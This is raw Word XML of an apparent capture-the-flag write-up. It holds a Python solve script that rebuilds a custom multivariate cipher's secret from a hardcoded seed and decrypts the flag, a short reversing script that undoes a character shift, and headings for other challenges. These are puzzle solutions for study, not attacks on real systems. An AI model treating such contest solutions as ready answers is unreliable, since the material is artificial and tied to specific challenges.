          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3932673C" wp14:editId="292EA6C8">
            <wp:extent cx="3667637" cy="3562847"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="12752579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799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BD2B" w14:textId="1CCF8247" w:rsidR="00D23FF6" w:rsidRPr="00D23FF6" w:rsidRDefault="00D23FF6" w:rsidP="00D23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0765B" wp14:editId="554E3FD1">
            <wp:extent cx="2393428" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="5672821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13" cy="24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8E55" w14:textId="41F87F40" w:rsidR="00D9228F" w:rsidRDefault="00D23FF6" w:rsidP="00D9228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1" w:name="_Toc207539472"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Adversarial Login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="279DA9B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1.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as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np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6683DEF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2.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tensorflow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as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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C0E7B2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3.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PIL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Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02969E6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4.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matplotlib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pyplot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as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plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67484B6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B81BB2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6.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Constants from the challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF4FCD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IMG_HEIGHT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IMG_WIDTH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224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224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439496C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TARGET_CLASS_ID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101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Gibbon class ID in ImageNet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36682B0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 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MSE_THRESHOLD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0.05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5546846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MAX_ITERATIONS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100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D514DD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LEARNING_RATE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0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0324DBD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3812CF0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13.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49D060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"""Preprocess image exactly like the challenge server"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE0EA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convert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'RGB'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resize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IMG_HEIGHT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IMG_WIDTH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6B84955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np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array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86172A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preprocessed_img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keras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applications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mobilenet_v2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preprocess_input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D7796D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convert_to_tensor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preprocessed_img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dtype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float32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FE2250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19.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1B3212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20.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postprocess_image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tensor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500AF9E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"""Convert tensor back to PIL Image"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502209F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Reverse the MobileNetV2 preprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E5C4B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tensor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3DB874DA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1.0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Reverse normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686796E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127.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6914EF3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np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clip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255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astype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np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uint8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32AD06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Image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fromarray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img_array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C89BFB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B8C56C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29.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calculate_mse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img1_tensor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img2_tensor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1E8CF0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"""Calculate MSE between two image tensors"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C149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reduce_mean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square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img1_tensor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img2_tensor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)).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568FC4A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477C03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33.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create_adversarial_example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output_path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"adversarial_gibbon.jpg"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6115C26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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACF49F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35.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Create an adversarial example that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54BE0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36.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1. Has MSE &lt; 0.05 compared to original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570AE8B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37.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2. Gets classified as gibbon (class 101) by MobileNetV2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E639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38.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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69903B2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39.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5D3B0F9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Load and preprocess the original image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD17FA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Image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open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919F55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3E4F63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61C7B63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Load the MobileNetV2 model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A621F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model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keras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applications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MobileNetV2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weights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imagenet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171CD3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55DB3BB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# Initialize adversarial </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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image</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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as copy of original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F52F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Variable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dtype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float32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36ECC5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49.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5CA2BE3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Optimizer for gradient descent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6800D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optimizer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keras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optimizers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Adam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learning_rate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LEARNING_RATE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2F4650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64D3ED1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"Starting adversarial attack..."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13AA23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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 54.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"Target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class: {TARGET_CLASS_ID} (gibbon)"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16E915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threshold: {MSE_THRESHOLD}"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9CAA39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6DF415FA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for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iteration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range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MAX_ITERATIONS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7FC048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with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GradientTape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as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tape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A47118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59.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tape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watch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3792BE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5A9558E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Get model prediction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FE9D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batch_input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expand_dims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axis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C3B7E4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prediction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model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batch_input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1675B9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4531203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# Loss: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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negative log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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probability of target class (we want to maximize it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACF96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target_loss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log_softmax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prediction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TARGET_CLASS_ID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EE9AD9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15B4DE9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MSE constraint loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CBCF7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69.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mse_current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reduce_mean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square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63E32A8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mse_penalty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maximum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0.0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mse_current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MSE_THRESHOLD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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE3412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5547534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Combined loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C52AA0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total_loss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target_loss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mse_penalty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A51A33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</w:p>
    <w:p w14:paraId="28EF323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Get gradients and update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B65916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gradients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tape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gradient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total_loss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289576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optimizer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apply_gradients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([(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gradients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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA922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</w:p>
    <w:p w14:paraId="66F5176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79.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Check progress every 10 iterations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F3D8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iteration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%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10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09385AF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current_pred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softmax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prediction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206269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predicted_class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argmax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current_pred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51037AE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confidence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current_pred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TARGET_CLASS_ID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0D8E8FB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calculate_mse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12B2D6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60789EE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"Iteration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{iteration:3d}: MSE={mse:.6f}, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75EF4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"Target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confidence={confidence:.4f}, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68151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"Predicted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class={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predicted_class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CFEA91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89.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</w:p>
    <w:p w14:paraId="50AAA47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Check if we've succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75191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predicted_class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TARGET_CLASS_ID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and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MSE_THRESHOLD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504F69D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"SUCCESS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at iteration {iteration}!"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19CD7B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93. </w:t>
      </w:r>
      <w:proofErr w:type="gram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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="490D5E0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0DE043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Final check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055B17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final_prediction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model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expand_dims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axis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7285EE2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final_class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argmax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softmax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final_prediction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]).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170D684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final_confidence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softmax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final_prediction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TARGET_CLASS_ID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numpy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7865DFBA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 99.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final_mse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calculate_mse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744D96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75547E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"\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nFinal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Results:"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DB4D3D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: {final_mse:.6f} (threshold: {MSE_THRESHOLD})"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D2EE3C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"Predicted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class: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final_class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AE4FD8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"Gibbon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confidence: {final_confidence:.4f}"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DDEA20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lastRenderedPageBreak/>
        <w:t xml:space="preserve">105.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constraint satisfied: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final_mse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&lt;= MSE_THRESHOLD}"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0FA775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"Classification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target met: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final_class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== TARGET_CLASS_ID}"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3C09F5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0FAEA86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Convert back to image and save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8017D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109.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adversarial_image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postprocess_image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F1E8BE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adversarial_image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save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output_path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quality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95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1EB35F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"Adversarial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image saved to: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output_path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7819B3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322C9B6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Show comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74533D2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fig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axes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plt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subplots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figsize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=(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5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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385EB10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3B93C1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imshow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444330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set_title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"Original Image"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7673FA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axis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'off'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F00EF6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119.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11EC720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imshow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6DF078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set_title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"Adversarial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Image\n(MSE: {final_mse:.4f})"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5318EF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axes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axis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'off'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946F61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325BD86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plt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tight_layout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088AA20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plt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savefig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"comparison.png"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dpi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150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bbox_inches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'tight'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9774EA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plt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show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</w:p>
    <w:p w14:paraId="0111EBB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78B723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adversarial_image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BA87E9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129.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A0C71E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130.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def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test_adversarial_example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image_path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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B933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"""Test if the adversarial example would pass the challenge checks"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB557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Load original for MSE comparison (you'll need the original image.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A575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Image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open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"image.jpg"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Make sure you have this file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15D61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CC3ECC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35F6AD5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# Load adversarial </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E922D5F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adv_image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Image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open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image_path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8E34DA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adv_tensor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preprocess_image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adv_image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3261B9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139.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17FC49B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Load model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5BD3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model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keras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applications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MobileNetV2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weights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imagenet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557B90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3160F15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Calculate MSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1692B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calculate_mse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original_tensor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007F5C3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5C6C0DF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Get prediction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386155B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prediction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model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expand_dims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adv_tensor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axis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verbose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92206C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predicted_class_id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np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argmax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prediction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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BBE9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149.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357B71B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Decode prediction for human readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6184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decoded_preds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tf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keras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applications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mobilenet_v2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decode_predictions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prediction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top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599E285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predicted_class_name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decoded_preds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237F906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confidence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decoded_preds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][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</w:p>
    <w:p w14:paraId="6FD40C6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34ED63E0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"=== ADVERSARIAL EXAMPLE TEST ==="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121D5DB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: {mse:.6f} (threshold: {MSE_THRESHOLD})"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BA1316A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check: {'PASS' if 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mse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&lt;= MSE_THRESHOLD else 'FAIL'}"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41F1739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lastRenderedPageBreak/>
        <w:t xml:space="preserve">158.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"Predicted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class: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predicted_class_name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} (ID: {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predicted_class_id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})"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6ED528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159.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"Confidence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: {confidence:.4f}"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983247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"Target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check: {'PASS' if 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predicted_class_id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== TARGET_CLASS_ID else 'FAIL'}"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771A978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5234465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overall_success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mse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MSE_THRESHOLD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and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predicted_class_id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TARGET_CLASS_ID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A7BAD9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proofErr w:type="gramStart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proofErr w:type="gram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"Overall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result: {'SUCCESS - Should get the flag!' if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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overall_success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else 'FAILED'}"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35BFF504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20276EE6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overall_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23D63C3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CD172A1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167.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__name__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"__main__"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3A278A7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Save the uploaded image as 'image.jpg' first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7DA5D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169.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"Make sure you have the original 'image.jpg' file in the same directory!"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5480E12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</w:p>
    <w:p w14:paraId="6F4B487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try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36273A1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 xml:space="preserve"># Create adversarial </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19EC8E2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173.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adversarial_image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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create_adversarial_example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"image.jpg"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"adversarial_gibbon.jpg"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3162312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174.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</w:p>
    <w:p w14:paraId="234C2628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175.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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Test the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60A459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176.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"\n"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"="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D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50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58DBFAE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177.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test_adversarial_example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"adversarial_gibbon.jpg"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29FF256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178.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</w:p>
    <w:p w14:paraId="3C4B3DF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179.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except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FileNotFoundError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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D95A44C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180.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"Error: Please save the original challenge image as 'image.jpg' in the same directory."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60CCB07A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181.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except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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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as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</w:p>
    <w:p w14:paraId="279B335B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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">182. </w:t>
      </w:r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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print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D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r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"Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: {e}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D23FF6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</w:p>
    <w:p w14:paraId="080DE747" w14:textId="77777777" w:rsidR="00D23FF6" w:rsidRPr="00D23FF6" w:rsidRDefault="00D23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368110"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">183. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54993BDA" w14:textId="77777777" w:rsidR="00D9228F" w:rsidRDefault="00D9228F" w:rsidP="00D9228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5469A51F" w14:textId="46A1C457" w:rsidR="00641585" w:rsidRPr="00D9228F" w:rsidRDefault="000E7622" w:rsidP="00641585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2" w:name="_Toc207539473"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Save the Kappa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="114811CA" w14:textId="15073531" w:rsidR="00641585" w:rsidRPr="00641585" w:rsidRDefault="00641585" w:rsidP="00641585">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00641585">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Solve Script </w:t>
      </w:r>
      <w:r w:rsidRPr="00641585">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attack.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: (needed to run twice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D202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1.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ethers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"ethers"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08188FD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2.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import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solc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from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solc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315383E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BF6EE8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4.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RPC_URL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"http://chal1.fwectf.com:8019"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7B28CBA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71A1BE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6.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=== Default values (edit if you prefer) ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACB94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7.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DEFAULT_PRIVATE_KEY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"0xedf34d476517415a540ecb0abed20791b9d4c9718157df8874ea27287d6837cd"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put private key here or pass as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arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="504D465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8.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DEFAULT_SETUP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"0x4bf010f1b9beDA5450a8dD702ED602A104ff65EE"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put Setup address here or pass as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arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F8F63C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 9.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DEFAULT_BANK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"0x4E0C596bE5FE217cB80AeB4C47C72701DFF0F6BC"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put Bank address here or pass as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arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AF36E4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7DB9C3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11.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Solidity attacker contract (same as before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F041FB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12.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source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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41FC3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13.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pragma solidity ^0.8.26;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A747A3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14.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interface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IVulnerableBank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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418102A5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15.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function deposit() external payable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F410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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 16.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function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withdrawAll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 external;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F195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17.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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAF57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18.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contract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ReentrantDrainer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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8BE0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19.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IVulnerableBank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public immutable bank;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F424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20.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address public immutable owner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED691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21.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uint256 public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depositAmount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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4868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22.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constructor(address _bank) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0971F5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23.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bank =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IVulnerableBank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(_bank);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65B585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24.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owner =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msg.sender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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F1905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25.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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B88C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26.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function attack(uint256 amount) external payable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB7AC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27.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require(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msg.sender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== owner, "not owner");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A23CD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28.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require(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msg.value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== amount &amp;&amp; amount &gt; 0, "bad amount");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500523C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29.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depositAmount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= amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A660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30.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bank.deposit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{value: amount}();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69FBF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31.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bank.withdrawAll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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF49E6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32.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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CD30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33.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receive() external payable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E924B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34.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if (address(bank).balance &gt;=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depositAmount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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233351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35.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   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bank.withdrawAll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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718953D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36.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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61D1F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37.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    (bool ok, ) =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owner.call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{value: address(this).balance}("");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1DF5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38.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    require(ok, "payout failed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA276F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39.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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB5B9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40.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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B68D7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41.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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E22F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42.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`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7C70268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5842B1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44.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compile with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solc-js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A75136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45.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function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compile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2876235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input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5737BBE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language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"Solidity"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</w:p>
    <w:p w14:paraId="1030058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sources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Attacker.sol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content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source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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4FDA0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49.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settings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outputSelection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"*"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"*"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abi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evm.bytecode.object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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B8F1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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E263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output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JSON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parse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solc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compile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JSON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stringify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input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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC442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(!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output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contracts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||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!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output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Attacker.sol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||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!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output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Attacker.sol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ReentrantDrainer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68FE520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error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Solc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output:"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output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F9E68B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throw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Error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"Compilation failed"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B23B32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239BEF0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contract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output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Attacker.sol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].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ReentrantDrainer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302CB02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bytecode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"0x"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contract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evm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bytecode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object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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E001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58.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40062FD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59.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8675CB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60.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function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usage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405CEF7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"Usage: node attack.js &lt;PRIVATE_KEY&gt; &lt;SETUP_ADDR&gt; &lt;BANK_ADDR&gt;"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85B5BE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"Or edit DEFAULT_PRIVATE_KEY / DEFAULT_SETUP / DEFAULT_BANK in the file."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3E2A00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63.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58226CA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3BAF5EB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65.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async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function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main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51D2869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CLI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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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override defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1481904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argv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process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argv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slice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9894D6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68.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PRIVATE_KEY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argv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0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DEFAULT_PRIVATE_KEY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336A950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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 69.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SETUP_ADDR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argv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1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DEFAULT_SETUP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1AE3DAA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BANK_ADDR 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argv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2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DEFAULT_BANK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3247F97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E3AC21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(!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PRIVATE_KEY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||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!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SETUP_ADDR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||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!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7F34E77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usage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2BA0846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throw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Error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"Missing required inputs (private key / setup / bank)."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804BBB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78A3045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0EA972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provider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JsonRpcProvider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RPC_URL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62B4D43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wallet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Wallet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PRIVATE_KEY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provider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E3ED65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79.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BB0B71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"Player:"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wallet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address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256BF89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"Setup:"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SETUP_ADDR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3A2D9F6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"Bank:"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348789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E46708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ABIs we need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58A03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bankAbi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</w:p>
    <w:p w14:paraId="4606A03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"function deposit() external payable"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</w:p>
    <w:p w14:paraId="073E2A9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"function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withdrawAll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 external"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</w:p>
    <w:p w14:paraId="76F4A1F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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F5988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89.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setupAbi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[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"function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isSolved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 external view returns (bool)"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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E873B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bank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Contract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wallet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21AD029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setup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Contract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SETUP_ADDR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setupAbi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wallet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5480D2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382E606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compile &amp; deploy attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634F5D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"Compiling attacker..."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18C8B35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bytecode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compile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6695EAB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059AEC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factory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ContractFactory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abi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bytecode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wallet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2B936C7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"Deploying attacker contract..."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51B4554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 99.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attacker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factory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deploy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E38C5B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waitForDeployment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33068C9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attackerAddr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getAddress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1D4B9DA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"Deployed attacker at:"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attackerAddr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8EABBC5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60325AB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Balances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE285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provider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getBalance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2DED9A7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eoaBal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provider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getBalance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wallet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address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F4BCEC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"Bank balance:"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bankBal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6A48725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"EOA balance:"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eoaBal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8569F4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109.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E2A8CA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===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0n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31623BA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"Bank already empty. Exiting."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2096775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return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476D150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3ECB9D6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461802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Get fee data &amp; estimate gas for attack (we can estimate with a small dummy value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E6A4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provider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getFeeData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4BC0074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sampleValue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parseUnits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"0.001"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"ether"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small sample for gas estimation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E3EE5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let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gasLimitEstimate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633B0DE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119.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try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6B91BE7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gasLimitEstimate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estimateGas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sampleValue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value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sampleValue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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5143FF9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catch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err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38B13E8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fallback: use a conservative number if estimate fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B80EB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">123.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warn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estimateGas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failed, using fallback gas limit (300k). Error:"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err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message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err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6A1873B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gasLimitEstimate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300000n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471D18E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4250BDA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2E881C1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Choose gas price / fees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB4EB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prefer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maxFeePerGas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(for EIP-1559), otherwise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gasPrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64F7959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129.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gasPrice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maxFeePerGas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gasPrice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parseUnits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"1"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gwei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932131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add a safety multiplier to gas limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113991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BigInt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Math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floor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Number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gasLimitEstimate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1.2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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E526F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*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BigInt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gasPrice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3D14346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B2C5F5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safety reserve for extra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txs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(0.002 ETH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00525E5B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reserve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parseUnits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"0.002"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"ether"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2FA830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0F827A3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// Compute deposit amount: min(bank/2,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eoa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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 xml:space="preserve"> - reserve)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96846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let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desired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/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2n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7861BAF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139.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desired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===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0n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desired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1n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584E1F8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81D0FE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let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maxSpend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0n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1DF80D2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eoaBal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&gt;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+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reserve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501D4AC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maxSpend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eoaBal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-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reserve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0ECAF50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else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1B262E7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error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"Not enough balance to cover gas + reserve.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eoa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eoaBal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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D12B7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throw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new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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error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"EOA has insufficient funds to run attack (need extra for gas)."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D7CB8A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44C51C1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8D3590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149.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let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amount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desired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maxSpend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?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desired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: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maxSpend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3F0B1DA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amount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&lt;=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0n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amount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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1n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287CC39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5569503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"Gas limit estimate:"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toString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());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4437940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"Gas price (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wei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):"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gasPrice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toString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());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23363A37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"Estimated gas cost (ETH):"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gasCost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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726424D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"Deposit amount chosen (ETH):"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amount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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7778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78E01FF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Now call attack with calculated gas settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49376F5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{};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB66AF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159.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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// provide gas settings if available</w:t>
